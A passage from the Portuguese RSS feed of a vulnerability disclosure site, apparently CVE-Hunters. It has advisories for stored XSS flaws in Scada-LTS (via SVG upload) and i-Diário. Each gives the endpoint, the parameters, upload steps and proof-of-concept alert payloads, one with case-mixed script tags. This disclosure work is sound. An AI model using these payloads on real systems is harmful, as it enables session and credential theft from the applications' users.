&amp;lt;/h2&amp;gt;&amp;lt;p align=&amp;#34;justify&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenado via desvio de upload de arquivo SVG foi identificada no endpoint &amp;lt;code&amp;gt;view_edit.shtm&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores enviem arquivos maliciosos para o parâmetro &amp;lt;code&amp;gt;backgroundImageMP&amp;lt;/code&amp;gt;. Os arquivos injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada por usuários, representando um risco significativo à segurança.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;view_edit.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;backgroundImageMP&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p align=&amp;#34;justify&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;backgroundImageMP&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p align=&amp;#34;justify&amp;#34;&amp;gt;Salve o payload no arquivo &amp;lt;code&amp;gt;xss.svg&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;p align=&amp;#34;justify&amp;#34;&amp;gt;Após isso, acesse a página &amp;lt;code&amp;gt;views.shtm&amp;lt;/code&amp;gt; e clique em &amp;lt;code&amp;gt;&amp;#34;computer &#43;&amp;#34;&amp;lt;/code&amp;gt; para adicionar uma nova &amp;lt;code&amp;gt;&amp;#34;view&amp;#34;&amp;lt;/code&amp;gt;, clique no botão &amp;lt;code&amp;gt;&amp;#34;Escolher arquivo&amp;#34;&amp;lt;/code&amp;gt; para escolher o arquivo malicioso, depois clique no botão &amp;lt;code&amp;gt;&amp;#34;Upload image&amp;#34;&amp;lt;/code&amp;gt; para enviar o arquivo. Em seguida, clique no botão &amp;lt;code&amp;gt;&amp;#34;Save&amp;#34;&amp;lt;/code&amp;gt;. Acesse o arquivo pela página de gatilho.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;5
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;xmlns&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;http:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;//&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;www&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;w3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;org&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;2000&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;fill&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;none&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;This&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;is&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;an&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;XSS&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;POC&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;from&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;CVEHUNTERS&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9145/image.png&amp;#34;
	width=&amp;#34;635&amp;#34;
	height=&amp;#34;266&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9145/image_hu_19b8b3d221202a9e.png 480w, /p/cve-2025-9145/image_hu_ce8f7117cded72f5.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;238&amp;#34;
		data-flex-basis=&amp;#34;572px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9145.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9145.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 19 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9104</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9104/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9104/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9104-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-planos-de-aulas-por-disciplinaid&amp;#34;&amp;gt;CVE-2025-9104: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/planos-de-aulas-por-disciplina/(ID)&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9104&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9104&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;/planos-de-aulas-por-disciplina/(ID)&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Objeto de Conhecimento&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Habilidades&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9104-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-planos-de-aulas-por-disciplinaid&amp;#34;&amp;gt;CVE-2025-9104: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/planos-de-aulas-por-disciplina/(ID)&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9104&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9104&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;/planos-de-aulas-por-disciplina/(ID)&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Objeto de Conhecimento&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Habilidades&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/planos-de-aulas-por-disciplina/(ID)&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros:&amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Objeto de Conhecimento&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Habilidades&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Objeto de Conhecimento&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Habilidades&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;ScRipT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;ScRipT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9104/image.png&amp;#34;
	width=&amp;#34;967&amp;#34;
	height=&amp;#34;843&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9104/image_hu_3d05674558fa6ba6.png 480w, /p/cve-2025-9104/image_hu_776361e30dbe0dfd.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;114&amp;#34;
		data-flex-basis=&amp;#34;275px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9104.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9104.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 18 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9105</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9105/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9105/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9105-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-planos-de-ensino-por-areas-de-conhecimentoid&amp;#34;&amp;gt;CVE-2025-9105: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/planos-de-ensino-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9105&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9105&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;/planos-de-ensino-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Habilidades&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/planos-de-ensino-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9105-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-planos-de-ensino-por-areas-de-conhecimentoid&amp;#34;&amp;gt;CVE-2025-9105: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/planos-de-ensino-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9105&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
